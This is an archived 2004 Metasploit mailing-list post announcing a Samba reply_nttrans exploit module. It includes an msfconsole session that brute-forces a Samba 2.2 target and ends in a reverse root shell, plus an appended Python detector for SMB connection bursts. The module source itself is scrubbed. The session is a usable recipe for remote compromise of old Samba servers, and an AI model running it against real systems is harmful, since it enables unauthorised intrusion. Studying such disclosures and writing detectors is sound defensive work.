Metasploit mailing list archives

Metasploit Samba reply_nttrans Module [OLD]


From: hdm at metasploit.com (H D Moore)
Date: Sun, 23 May 2004 01:29:31 -0500

Attached is an exploit module for version 2.0 of the Metasploit 
Framework. This module was based on Flatline's sambash.c exploit and 
includes some interesting improvements:

- Smaller step size and multiple connections for reliable brute force
- Should work against any Samba <= 2.2.7 Linux installation
- Displays a time estimate when using the larger brute force methods
- Tested against a handful of versions between 2.0.1 and 2.2.7
- The only public *working* Samba 2.0.x exploit I know of  [1]

If the target system is running version 2.2 of Samba, you are still better 
off using the trans2open module instead. This was written to fill a gap 
and allow exploitation of older Samba installations. 

To use this module, copy the attached file into the "exploits" 
subdirectory of the Metasploit Framework 2.0 installation. Win32 users 
should copy this file into $BASE\home\framework-2.0\exploits, where $BASE 
is where you installed the Framework.

If for some reason you don't have the Metasploit Framework installed, grab 
it from the following URL:

http://metasploit.com/projects/Framework/

We are estimating that version 2.1 will be ready for release in early 
June. It will consist of mostly bug fixes, with only a few new exploits 
and payloads. Version 2.2 should be available sometime around August and 
will include dramatic improvements to the user interfaces, the core 
modules, and contain a ton of new functionality. Thank you to everyone 
who has been providing bug reports and suggestions for new features!

Cheers,

-HD

1. To clarify, it is the only exploit I know of that can reliably pop a 
shell on systems running the 2.0 series. Some of the other 
vulnerabilities discovered in the 2.2 tree also apply, but nobody had 
written code for them. The 2.0 series is still all over the place; until 
recently it was still being used by VMWare to provide access to the host 
filesystem, not to mention all those cheesy Linux appliances and storage 
solutions...

msf samba_nttrans > set RHOST 192.168.1.207
RHOST -> 192.168.1.207
msf samba_nttrans > set PAYLOAD linx86reverse_xor
PAYLOAD -> linx86reverse_xor
msf samba_nttrans(linx86reverse_xor) > set XKEY 99
XKEY -> 99
msf samba_nttrans(linx86reverse_xor) > set LHOST 192.168.1.244
LHOST -> 192.168.1.244
msf samba_nttrans(linx86reverse_xor) > set LPORT 4321
LPORT -> 4321
msf samba_nttrans(linx86reverse_xor) > show targets

Supported Exploit Targets
=========================

   0  Samba Complete Brute Force
   1  Samba 2.0 Brute Force
   2  Samba 2.2 Brute Force
   3  Samba 2.0.7 / Red Hat 7.0
   4  Samba 2.2.1 / Red Hat 7.2
   5  Samba 2.2.5 / Red Hat 8.0

msf samba_nttrans(linx86reverse_xor) > set TARGET 2
TARGET -> 2
msf samba_nttrans(linx86reverse_xor) > exploit
[*] Starting Reverse Handler.
[*] Starting attack against target Samba 2.2 Brute Force
[*] Attack will use 30 threads with 819 total attempts

[*] Brute force should complete in approximately 8.3 minutes
[*] Establishing 50 connection(s) to the target...
[*] --- Setting up the SMB session...
[*] --- Establishing tree connection...
[*] --- Sending first nttrans component...
[*] --- Completed range 0x08229280:0x08215a00

[ ... ]

[*] Brute force should complete in approximately 7.8 minutes
[*] Establishing 50 connection(s) to the target...
[*] --- Setting up the SMB session...
[*] --- Establishing tree connection...
[*] --- Sending first nttrans component...
[*] Got connection from 192.168.1.207:1120

sh: no job control in this shell
sh-2.05#
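The session above is noisy from the network's point of view: each brute-force round opens 50 SMB connections to the target within seconds, and the rounds repeat for minutes. The following is an added example for this archive page, not part of HD's post or the samba_nttrans module, showing how a defender could pick that pattern out of a connection log. The log format (one line per connection, "<epoch> <src_ip> -> <dst_ip>:<dst_port>") and the sample lines are constructed assumptions; the threshold and window are tunable.

```python
"""Flag sources that open a burst of SMB connections, the pattern a
multi-connection brute force like the session above produces.

Added example; not code from the samba_nttrans module or the Metasploit
Framework. Assumed log format: "<epoch> <src_ip> -> <dst_ip>:<dst_port>".
"""
from collections import defaultdict, deque

SMB_PORTS = {139, 445}   # NetBIOS session service and direct-hosted SMB


def parse_line(line):
    """Parse one log line into (timestamp, src, dst, port); None if malformed."""
    parts = line.split()
    if len(parts) != 4 or parts[2] != "->":
        return None
    try:
        ts = float(parts[0])
        dst, port = parts[3].rsplit(":", 1)
        return ts, parts[1], dst, int(port)
    except ValueError:
        return None


def smb_bursts(lines, threshold=20, window=60.0):
    """Return {src: burst_start_ts} for every source that makes at least
    `threshold` SMB connections inside any `window`-second span.

    Events are sorted by timestamp first, so the input need not be ordered.
    A per-source deque holds only the timestamps still inside the window.
    """
    events = sorted(e for e in map(parse_line, lines) if e and e[3] in SMB_PORTS)
    recent = defaultdict(deque)   # src -> timestamps within the current window
    alerts = {}
    for ts, src, _dst, _port in events:
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = q[0]   # record when the burst began
    return alerts


def sample_log():
    """Constructed sample: a quiet file-server client, one source that opens
    50 SMB connections in ten seconds (the per-round count in the session
    above), a non-SMB connection and a malformed line."""
    lines = [
        "1085300000 10.0.0.5 -> 10.0.0.1:445",
        "1085300030 10.0.0.5 -> 10.0.0.1:445",
        "1085300500 10.0.0.5 -> 10.0.0.1:139",
        "1085300200 10.0.0.7 -> 10.0.0.1:80",
        "garbage line",
    ]
    lines += [f"{1085300100 + i * 0.2:.1f} 10.0.0.9 -> 10.0.0.1:139"
              for i in range(50)]
    return lines


if __name__ == "__main__":
    for src, start in smb_bursts(sample_log()).items():
        print(f"possible SMB brute force from {src}, burst started at {start:.0f}")
```

Twenty connections in a minute to a file server is a loose threshold; on a busy server the right value comes from a baseline of normal client behaviour. The alert keys on the first timestamp of the burst so that a repeating round (as in the transcript) raises one alert per source rather than one per connection.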
-------------- next part --------------
A non-text attachment was scrubbed...
Name: samba_nttrans.pm
Type: application/x-perl-module
Size: 9597 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20040523/bcaccc76/attachment.bin>
